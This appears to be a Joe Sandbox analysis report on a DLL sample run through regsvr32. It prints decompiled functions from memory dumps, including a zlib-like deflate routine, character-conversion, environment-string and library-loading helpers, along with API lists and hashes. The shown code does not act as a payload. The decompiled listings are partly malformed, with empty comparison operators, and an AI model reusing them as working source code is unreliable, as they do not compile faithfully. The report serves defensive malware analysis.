            			E027B4180(int _a4, signed int _a8) {
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				void* __esi;
				void* _t137;
				signed int _t141;
				intOrPtr* _t142;
				signed int _t145;
				signed int _t146;
				intOrPtr _t151;
				intOrPtr _t161;
				intOrPtr _t162;
				intOrPtr _t167;
				intOrPtr _t170;
				signed int _t172;
				intOrPtr _t173;
				int _t184;
				intOrPtr _t185;
				intOrPtr _t188;
				signed int _t189;
				void* _t195;
				int _t202;
				int _t208;
				intOrPtr _t217;
				signed int _t218;
				int _t219;
				intOrPtr _t220;
				signed int _t221;
				signed int _t222;
				int _t224;
				int _t225;
				signed int _t227;
				intOrPtr _t228;
				int _t232;
				int _t234;
				signed int _t235;
				int _t239;
				void* _t240;
				int _t245;
				int _t252;
				signed int _t253;
				int _t254;
				void* _t257;
				void* _t258;
				int _t259;
				intOrPtr _t260;
				int _t261;
				signed int _t269;
				signed int _t271;
				intOrPtr* _t272;
				void* _t273;

				_t253 = _a8;
				_t272 = _a4;
				_t3 = _t272 + 0xc; // 0x452bf84d
				_t4 = _t272 + 0x2c; // 0x8df075ff
				_t228 =  *_t4;
				_t137 =  *_t3 + 0xfffffffb;
				_t229 =  <=  ? _t137 : _t228;
				_v16 =  <=  ? _t137 : _t228;
				_t269 = 0;
				_a4 =  *((intOrPtr*)( *_t272 + 4));
				asm("o16 nop [eax+eax]");
				while(1) {
					_t8 = _t272 + 0x16bc; // 0x5deed9c3
					_t141 =  *_t8 + 0x2a >> 3;
					_v12 = 0xffff;
					_t217 =  *((intOrPtr*)( *_t272 + 0x10));
					if(_t217 < _t141) {
						break;
					}
					_t11 = _t272 + 0x6c; // 0xf8e4158b
					_t12 = _t272 + 0x5c; // 0x35e85000
					_t245 =  *_t11 -  *_t12;
					_v8 = _t245;
					_t195 =  *((intOrPtr*)( *_t272 + 4)) + _t245;
					_t247 =  <  ? _t195 : _v12;
					_t227 =  <=  ?  <  ? _t195 : _v12 : _t217 - _t141;
					if(_t227 >= _v16) {
						L7:
						if(_t253 != 4) {
							L10:
							_t269 = 0;
							__eflags = 0;
						} else {
							_t285 = _t227 - _t195;
							if(_t227 != _t195) {
								goto L10;
							} else {
								_t269 = _t253 - 3;
							}
						}
						E027B71A0(_t272, _t272, 0, 0, _t269);
						_t18 = _t272 + 0x14; // 0xc703f045
						_t19 = _t272 + 8; // 0x8d000040
						 *( *_t18 +  *_t19 - 4) = _t227;
						_t22 = _t272 + 0x14; // 0xc703f045
						_t23 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t22 +  *_t23 - 3)) = _t227 >> 8;
						_t26 = _t272 + 0x14; // 0xc703f045
						_t27 = _t272 + 8; // 0x8d000040
						 *( *_t26 +  *_t27 - 2) =  !_t227;
						_t30 = _t272 + 0x14; // 0xc703f045
						_t31 = _t272 + 8; // 0x8d000040
						 *((char*)( *_t30 +  *_t31 - 1)) =  !_t227 >> 8;
						E027B5F00(_t285,  *_t272);
						_t202 = _v8;
						_t273 = _t273 + 0x14;
						if(_t202 != 0) {
							_t208 =  >  ? _t227 : _t202;
							_v8 = _t208;
							_t36 = _t272 + 0x38; // 0xf47d8bff
							_t37 = _t272 + 0x5c; // 0x35e85000
							memcpy( *( *_t272 + 0xc),  *_t36 +  *_t37, _t208);
							_t273 = _t273 + 0xc;
							_t252 = _v8;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t252;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t252;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t252;
							 *(_t272 + 0x5c) =  *(_t272 + 0x5c) + _t252;
							_t227 = _t227 - _t252;
						}
						if(_t227 != 0) {
							E027B6040( *_t272,  *( *_t272 + 0xc), _t227);
							_t273 = _t273 + 0xc;
							 *( *_t272 + 0xc) =  *( *_t272 + 0xc) + _t227;
							 *((intOrPtr*)( *_t272 + 0x10)) =  *((intOrPtr*)( *_t272 + 0x10)) - _t227;
							 *((intOrPtr*)( *_t272 + 0x14)) =  *((intOrPtr*)( *_t272 + 0x14)) + _t227;
						}
						_t253 = _a8;
						if(_t269 == 0) {
							continue;
						}
					} else {
						if(_t227 != 0 || _t253 == 4) {
							if(_t253 != 0 && _t227 == _t195) {
								goto L7;
							}
						}
					}
					break;
				}
				_t142 =  *_t272;
				_t232 = _a4 -  *((intOrPtr*)(_t142 + 4));
				_a4 = _t232;
				if(_t232 == 0) {
					_t83 = _t272 + 0x6c; // 0xf8e4158b
					_t254 =  *_t83;
				} else {
					_t59 = _t272 + 0x2c; // 0x8df075ff
					_t224 =  *_t59;
					if(_t232 < _t224) {
						_t65 = _t272 + 0x3c; // 0x830cc483
						_t66 = _t272 + 0x6c; // 0xf8e4158b
						_t260 =  *_t66;
						__eflags =  *_t65 - _t260 - _t232;
						if( *_t65 - _t260 <= _t232) {
							_t67 = _t272 + 0x38; // 0xf47d8bff
							_t261 = _t260 - _t224;
							 *(_t272 + 0x6c) = _t261;
							memcpy( *_t67,  *_t67 + _t224, _t261);
							_t70 = _t272 + 0x16b0; // 0x830a74c0
							_t188 =  *_t70;
							_t273 = _t273 + 0xc;
							_t232 = _a4;
							__eflags = _t188 - 2;
							if(_t188 < 2) {
								_t189 = _t188 + 1;
								__eflags = _t189;
								 *(_t272 + 0x16b0) = _t189;
							}
						}
						_t73 = _t272 + 0x38; // 0xf47d8bff
						_t74 = _t272 + 0x6c; // 0xf8e4158b
						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
						_t225 = _a4;
						_t273 = _t273 + 0xc;
						_t76 = _t272 + 0x6c;
						 *_t76 =  *(_t272 + 0x6c) + _t225;
						__eflags =  *_t76;
						_t78 = _t272 + 0x6c; // 0xf8e4158b
						_t184 =  *_t78;
						_t79 = _t272 + 0x2c; // 0x8df075ff
						_t239 =  *_t79;
					} else {
						 *(_t272 + 0x16b0) = 2;
						_t61 = _t272 + 0x38; // 0xf47d8bff
						memcpy( *_t61,  *_t142 - _t224, _t224);
						_t62 = _t272 + 0x2c; // 0x8df075ff
						_t184 =  *_t62;
						_t273 = _t273 + 0xc;
						_t225 = _a4;
						_t239 = _t184;
						 *(_t272 + 0x6c) = _t184;
					}
					_t254 = _t184;
					 *(_t272 + 0x5c) = _t184;
					_t81 = _t272 + 0x16b4; // 0x5750438
					_t185 =  *_t81;
					_t240 = _t239 - _t185;
					_t241 =  <=  ? _t225 : _t240;
					_t242 = ( <=  ? _t225 : _t240) + _t185;
					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
				}
				if( *(_t272 + 0x16c0) < _t254) {
					 *(_t272 + 0x16c0) = _t254;
				}
				if(_t269 == 0) {
					_t218 = _a8;
					__eflags = _t218;
					if(_t218 == 0) {
						L34:
						_t89 = _t272 + 0x3c; // 0x830cc483
						_t219 =  *_t272;
						_t145 =  *_t89 - _t254 - 1;
						_a4 =  *_t272;
						_t234 = _t254;
						_v16 = _t145;
						_v8 = _t254;
						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
							_v8 = _t254;
							_t95 = _t272 + 0x5c; // 0x35e85000
							_a4 = _t219;
							_t234 = _t254;
							_t97 = _t272 + 0x2c; // 0x8df075ff
							__eflags =  *_t95 -  *_t97;
							if( *_t95 >=  *_t97) {
								_t98 = _t272 + 0x2c; // 0x8df075ff
								_t167 =  *_t98;
								_t259 = _t254 - _t167;
								_t99 = _t272 + 0x38; // 0xf47d8bff
								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
								 *(_t272 + 0x6c) = _t259;
								memcpy( *_t99, _t167 +  *_t99, _t259);
								_t103 = _t272 + 0x16b0; // 0x830a74c0
								_t170 =  *_t103;
								_t273 = _t273 + 0xc;
								__eflags = _t170 - 2;
								if(_t170 < 2) {
									_t172 = _t170 + 1;
									__eflags = _t172;
									 *(_t272 + 0x16b0) = _t172;
								}
								_t106 = _t272 + 0x2c; // 0x8df075ff
								_t145 = _v16 +  *_t106;
								__eflags = _t145;
								_a4 =  *_t272;
								_t108 = _t272 + 0x6c; // 0xf8e4158b
								_t234 =  *_t108;
								_v8 = _t234;
							}
						}
						_t255 = _a4;
						_t220 =  *((intOrPtr*)(_a4 + 4));
						__eflags = _t145 - _t220;
						_t221 =  <=  ? _t145 : _t220;
						_t146 = _t221;
						_a4 = _t221;
						_t222 = _a8;
						__eflags = _t146;
						if(_t146 != 0) {
							_t114 = _t272 + 0x38; // 0xf47d8bff
							E027B6040(_t255,  *_t114 + _v8, _t146);
							_t273 = _t273 + 0xc;
							_t117 = _t272 + 0x6c;
							 *_t117 =  *(_t272 + 0x6c) + _a4;
							__eflags =  *_t117;
							_t119 = _t272 + 0x6c; // 0xf8e4158b
							_t234 =  *_t119;
						}
						__eflags =  *(_t272 + 0x16c0) - _t234;
						if( *(_t272 + 0x16c0) < _t234) {
							 *(_t272 + 0x16c0) = _t234;
						}
						_t122 = _t272 + 0x16bc; // 0x5deed9c3
						_t123 = _t272 + 0xc; // 0x452bf84d
						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
						__eflags = _t257 - 0xffff;
						_t258 =  >  ? 0xffff : _t257;
						_t124 = _t272 + 0x2c; // 0x8df075ff
						_t151 =  *_t124;
						_t125 = _t272 + 0x5c; // 0x35e85000
						_t235 = _t234 -  *_t125;
						__eflags = _t258 - _t151;
						_t152 =  <=  ? _t258 : _t151;
						__eflags = _t235 - ( <=  ? _t258 : _t151);
						if(_t235 >= ( <=  ? _t258 : _t151)) {
							L49:
							__eflags = _t235 - _t258;
							_t154 =  >  ? _t258 : _t235;
							_a4 =  >  ? _t258 : _t235;
							__eflags = _t222 - 4;
							if(_t222 != 4) {
								L53:
								_t269 = 0;
								__eflags = 0;
							} else {
								_t161 =  *_t272;
								__eflags =  *(_t161 + 4);
								_t154 = _a4;
								if( *(_t161 + 4) != 0) {
									goto L53;
								} else {
									__eflags = _t154 - _t235;
									if(_t154 != _t235) {
										goto L53;
									} else {
										_t269 = _t222 - 3;
									}
								}
							}
							_t131 = _t272 + 0x38; // 0xf47d8bff
							_t132 = _t272 + 0x5c; // 0x35e85000
							E027B71A0(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
							_t134 = _t272 + 0x5c;
							 *_t134 =  *(_t272 + 0x5c) + _a4;
							__eflags =  *_t134;
							E027B5F00( *_t134,  *_t272);
						} else {
							__eflags = _t235;
							if(_t235 != 0) {
								L46:
								__eflags = _t222;
								if(_t222 != 0) {
									_t162 =  *_t272;
									__eflags =  *(_t162 + 4);
									if( *(_t162 + 4) == 0) {
										__eflags = _t235 - _t258;
										if(_t235 <= _t258) {
											goto L49;
										}
									}
								}
							} else {
								__eflags = _t222 - 4;
								if(_t222 == 4) {
									goto L46;
								}
							}
						}
						asm("sbb edi, edi");
						_t271 =  ~_t269 & 0x00000002;
						__eflags = _t271;
						return _t271;
					} else {
						__eflags = _t218 - 4;
						if(_t218 == 4) {
							goto L34;
						} else {
							_t173 =  *_t272;
							__eflags =  *(_t173 + 4);
							if( *(_t173 + 4) != 0) {
								goto L34;
							} else {
								_t88 = _t272 + 0x5c; // 0x35e85000
								__eflags = _t254 -  *_t88;
								if(_t254 !=  *_t88) {
									goto L34;
								} else {
									return 1;
								}
							}
						}
					}
				} else {
					return 3;
				}
			}






















































            0x027b4186
            0x027b418b
            0x027b418f
            0x027b4192
            0x027b4192
            0x027b4195
            0x027b419a
            0x027b419f
            0x027b41a2
            0x027b41a7
            0x027b41aa
            0x027b41b0
            0x027b41b0
            0x027b41bb
            0x027b41be
            0x027b41c5
            0x027b41ca
            0x00000000
            0x00000000
            0x027b41d0
            0x027b41d5
            0x027b41d5
            0x027b41da
            0x027b41e0
            0x027b41ea
            0x027b41ef
            0x027b41f5
            0x027b4214
            0x027b4217
            0x027b4222
            0x027b4222
            0x027b4222
            0x027b4219
            0x027b4219
            0x027b421b
            0x00000000
            0x027b421d
            0x027b421d
            0x027b421d
            0x027b421b
            0x027b422a
            0x027b422f
            0x027b4234
            0x027b423a
            0x027b423e
            0x027b4241
            0x027b4244
            0x027b424a
            0x027b424f
            0x027b4252
            0x027b4258
            0x027b425d
            0x027b4263
            0x027b4269
            0x027b426e
            0x027b4271
            0x027b4276
            0x027b427a
            0x027b427e
            0x027b4281
            0x027b4284
            0x027b428d
            0x027b4294
            0x027b4297
            0x027b429a
            0x027b429f
            0x027b42a4
            0x027b42a7
            0x027b42aa
            0x027b42aa
            0x027b42ae
            0x027b42b7
            0x027b42be
            0x027b42c1
            0x027b42c6
            0x027b42cb
            0x027b42cb
            0x027b42ce
            0x027b42d3
            0x00000000
            0x00000000
            0x027b41f7
            0x027b41f9
            0x027b4206
            0x00000000
            0x00000000
            0x027b4206
            0x027b41f9
            0x00000000
            0x027b41f5
            0x027b42d9
            0x027b42de
            0x027b42e1
            0x027b42e4
            0x027b438f
            0x027b438f
            0x027b42ea
            0x027b42ea
            0x027b42ea
            0x027b42ef
            0x027b4319
            0x027b431c
            0x027b431c
            0x027b4321
            0x027b4323
            0x027b4325
            0x027b4328
            0x027b432b
            0x027b4333
            0x027b4338
            0x027b4338
            0x027b433e
            0x027b4341
            0x027b4344
            0x027b4347
            0x027b4349
            0x027b4349
            0x027b434a
            0x027b434a
            0x027b4347
            0x027b4358
            0x027b435b
            0x027b435f
            0x027b4364
            0x027b4367
            0x027b436a
            0x027b436a
            0x027b436a
            0x027b436d
            0x027b436d
            0x027b4370
            0x027b4370
            0x027b42f1
            0x027b42f1
            0x027b4301
            0x027b4304
            0x027b4309
            0x027b4309
            0x027b430c
            0x027b430f
            0x027b4312
            0x027b4314
            0x027b4314
            0x027b4373
            0x027b4375
            0x027b4378
            0x027b4378
            0x027b437e
            0x027b4382
            0x027b4385
            0x027b4387
            0x027b4387
            0x027b4398
            0x027b439a
            0x027b439a
            0x027b43a2
            0x027b43b0
            0x027b43b3
            0x027b43b5
            0x027b43d5
            0x027b43d5
            0x027b43d8
            0x027b43de
            0x027b43df
            0x027b43e2
            0x027b43e4
            0x027b43e7
            0x027b43ea
            0x027b43ed
            0x027b43f1
            0x027b43f4
            0x027b43f7
            0x027b43fa
            0x027b43fc
            0x027b43fc
            0x027b43ff
            0x027b4401
            0x027b4401
            0x027b4404
            0x027b4406
            0x027b4409
            0x027b4411
            0x027b4414
            0x027b4419
            0x027b4419
            0x027b441f
            0x027b4422
            0x027b4425
            0x027b4427
            0x027b4427
            0x027b4428
            0x027b4428
            0x027b4433
            0x027b4433
            0x027b4433
            0x027b4436
            0x027b4439
            0x027b4439
            0x027b443c
            0x027b443c
            0x027b43ff
            0x027b443f
            0x027b4442
            0x027b4445
            0x027b4447
            0x027b444a
            0x027b444c
            0x027b444f
            0x027b4452
            0x027b4454
            0x027b4457
            0x027b445f
            0x027b4467
            0x027b446a
            0x027b446a
            0x027b446a
            0x027b446d
            0x027b446d
            0x027b446d
            0x027b4470
            0x027b4476
            0x027b4478
            0x027b4478
            0x027b447e
            0x027b4484
            0x027b448d
            0x027b4494
            0x027b4496
            0x027b4499
            0x027b4499
            0x027b449c
            0x027b449c
            0x027b449f
            0x027b44a1
            0x027b44a4
            0x027b44a6
            0x027b44c1
            0x027b44c1
            0x027b44c5
            0x027b44c8
            0x027b44cb
            0x027b44ce
            0x027b44e4
            0x027b44e4
            0x027b44e4
            0x027b44d0
            0x027b44d0
            0x027b44d2
            0x027b44d6
            0x027b44d9
            0x00000000
            0x027b44db
            0x027b44db
            0x027b44dd
            0x00000000
            0x027b44df
            0x027b44df
            0x027b44df
            0x027b44dd
            0x027b44d9
            0x027b44e8
            0x027b44eb
            0x027b44f0
            0x027b44fa
            0x027b44fa
            0x027b44fa
            0x027b44fd
            0x027b44a8
            0x027b44a8
            0x027b44aa
            0x027b44b1
            0x027b44b1
            0x027b44b3
            0x027b44b5
            0x027b44b7
            0x027b44bb
            0x027b44bd
            0x027b44bf
            0x00000000
            0x00000000
            0x027b44bf
            0x027b44bb
            0x027b44ac
            0x027b44ac
            0x027b44af
            0x00000000
            0x00000000
            0x027b44af
            0x027b44aa
            0x027b4507
            0x027b4509
            0x027b4509
            0x027b4514
            0x027b43b7
            0x027b43b7
            0x027b43ba
            0x00000000
            0x027b43bc
            0x027b43bc
            0x027b43be
            0x027b43c2
            0x00000000
            0x027b43c4
            0x027b43c4
            0x027b43c4
            0x027b43c7
            0x00000000
            0x027b43cb
            0x027b43d4
            0x027b43d4
            0x027b43c7
            0x027b43c2
            0x027b43ba
            0x027b43a6
            0x027b43af
            0x027b43af

            APIs
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: memcpy
            • String ID:
            • API String ID: 3510742995-0
            • Opcode ID: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
            • Instruction ID: 9abb05e9f6112c221adfece80d12d51b4527468e2d3e8f1c6b11d77c8ab5dc0b
            • Opcode Fuzzy Hash: f1afd37047e1a430684766b2403e559c42319dabe810c329b3ba98596797b03d
            • Instruction Fuzzy Hash: D4D11575A006049FCB25CF6DD8E4AAAB7F5FF88304B24892DE88AC7742D731E944CB55
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D5103C3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
            Download Yara Rule
            C-Code - Quality: 81%
            			E6D5103C3(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0x6d55ce08; // 0x70cfd039
				_v8 = _t34 ^ _t70;
				E6D50B580(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t53 =  *(_v24 + 8);
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E6D508B95(_v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E6D509250(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E6D5104E0(_t69);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t48 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E6D50B438(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E6D513490();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















            0x6d5103cb
            0x6d5103d2
            0x6d5103de
            0x6d5103e3
            0x6d5103e8
            0x6d5103ed
            0x6d5103f0
            0x6d5103f2
            0x6d5103f2
            0x6d5103f7
            0x6d510410
            0x6d510416
            0x6d51041b
            0x6d5104ba
            0x6d5104be
            0x6d5104c3
            0x6d5104c3
            0x6d5104df
            0x6d5104df
            0x6d510421
            0x6d510424
            0x6d510429
            0x6d51042d
            0x6d510479
            0x6d51047b
            0x6d51047d
            0x6d510482
            0x6d510499
            0x6d5104a1
            0x6d5104b1
            0x6d5104b1
            0x6d5104a1
            0x6d5104b3
            0x6d5104b4
            0x00000000
            0x6d5104b9
            0x6d51042f
            0x6d510434
            0x6d510436
            0x6d510438
            0x6d510438
            0x6d510440
            0x6d51045d
            0x6d510467
            0x6d51046c
            0x00000000
            0x00000000
            0x6d51046e
            0x6d510474
            0x6d510474
            0x00000000
            0x6d510474
            0x6d510444
            0x6d510448
            0x6d51044d
            0x6d510451
            0x00000000
            0x00000000
            0x6d510453
            0x00000000

            APIs
            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,6D50DAF1,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 6D510410
            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D510499
            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 6D5104AB
            • __freea.LIBCMT ref: 6D5104B4
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ByteCharMultiWide$AllocHeapStringType__freea
            • String ID:
            • API String ID: 573072132-0
            • Opcode ID: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction ID: ef0240e1946353bac50c743b73a3b02e0c797ecb1fa255f66c55e96db10a9baa
            • Opcode Fuzzy Hash: 86144a8a7f9a1a338337e632a2b87417814e03e44f2811e709a257b601f73315
            • Instruction Fuzzy Hash: 3731D072A0421AABEF199F6ACCC0EBE3BB5EB41310F054529EC14D6650E779CD64CB90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50DCAB Relevance: 6.1, APIs: 4, Instructions: 68COMMON
            Download Yara Rule
            C-Code - Quality: 93%
            			E6D50DCAB() {
				int _v8;
				void* __ecx;
				void* _t6;
				int _t7;
				char* _t13;
				int _t17;
				void* _t19;
				char* _t25;
				WCHAR* _t27;

				_t27 = GetEnvironmentStringsW();
				if(_t27 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t6 = E6D50DC74(_t27);
					_pop(_t19);
					_t17 = _t6 - _t27 >> 1;
					_t7 = WideCharToMultiByte(0, 0, _t27, _t17, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t25 = E6D50B438(_t19, _t7);
						if(_t25 == 0 || WideCharToMultiByte(0, 0, _t27, _t17, _t25, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t25;
							_t25 = 0;
						}
						E6D50B3FE(_t25);
					}
				}
				if(_t27 != 0) {
					FreeEnvironmentStringsW(_t27);
				}
				return _t13;
			}












            0x6d50dcba
            0x6d50dcc0
            0x6d50dd18
            0x6d50dd18
            0x6d50dcc2
            0x6d50dcc3
            0x6d50dcc8
            0x6d50dcd1
            0x6d50dcd7
            0x6d50dcdd
            0x6d50dce2
            0x00000000
            0x6d50dce4
            0x6d50dcea
            0x6d50dcef
            0x6d50dd0d
            0x6d50dd07
            0x6d50dd07
            0x6d50dd09
            0x6d50dd09
            0x6d50dd10
            0x6d50dd15
            0x6d50dce2
            0x6d50dd1c
            0x6d50dd1f
            0x6d50dd1f
            0x6d50dd2d

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 6D50DCB4
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6D50DCD7
              • Part of subcall function 6D50B438: HeapAlloc.KERNEL32(00000000,00000001,00000004,?,6D5107B0,00000001,00000000,?,6D50E12F,00000001,00000004,00000000,00000001,?,?,6D50B13D), ref: 6D50B46A
            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 6D50DCFD
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6D50DD1F
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385779816.000000006D55F000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_6d500000_regsvr32.jbxd
            Similarity
            • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap
            • String ID:
            • API String ID: 1993637811-0
            • Opcode ID: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction ID: 0810b439916e4b646fc2f827997c8d2e57cf25fd2439668f7fa243db4e915aac
            • Opcode Fuzzy Hash: 1013eba4e5562f3d8dfc814a58c35e6665841e7185b3ecc7bb528578234fffd5
            • Instruction Fuzzy Hash: 3E01D8776016177B6B1556BA5C8CD7B2A7DDFC7A91316011EF924C3E00EB608D0181F0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D50CA59 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
            Download Yara Rule
            C-Code - Quality: 95%
            			E6D50CA59(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x6d55dc90 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x6d539670 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x70cfd03a
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










            0x6d50ca5e
            0x6d50ca62
            0x6d50ca69
            0x6d50ca6d
            0x6d50ca7b
            0x6d50ca91
            0x6d50ca95
            0x6d50cabe
            0x6d50cac0
            0x6d50cac4
            0x6d50cac7
            0x6d50cac7
            0x6d50cacd
            0x6d50cacf
            0x00000000
            0x6d50cad0
            0x6d50ca97
            0x6d50caa0
            0x6d50caaf
            0x6d50caa2
            0x6d50caa5
            0x6d50caab
            0x6d50caab
            0x6d50cab3
            0x00000000
            0x6d50cab5
            0x6d50cab8
            0x6d50caba
            0x00000000
            0x6d50caba
            0x6d50cab3
            0x6d50ca6f
            0x6d50ca74
            0x00000000

            APIs
            • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,?,00000001,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId), ref: 6D50CA8B
            • GetLastError.KERNEL32(?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CA97
            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,6D50CA00,?,00000001,00000000,?,?,6D50CE4B,00000008,GetCurrentPackageId,6D539B48,GetCurrentPackageId,00000000), ref: 6D50CAA5
            Memory Dump Source
            • Source File: 00000002.00000002.385586279.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000002.00000002.385570851.000000006D500000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385653547.000000006D51B000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385728691.000000006D540000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385742413.000000006D541000.00000008.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000002.00000002.385767720.000000006D55C000.00000004.00000001.01000000.00000003.sdmpDownload File
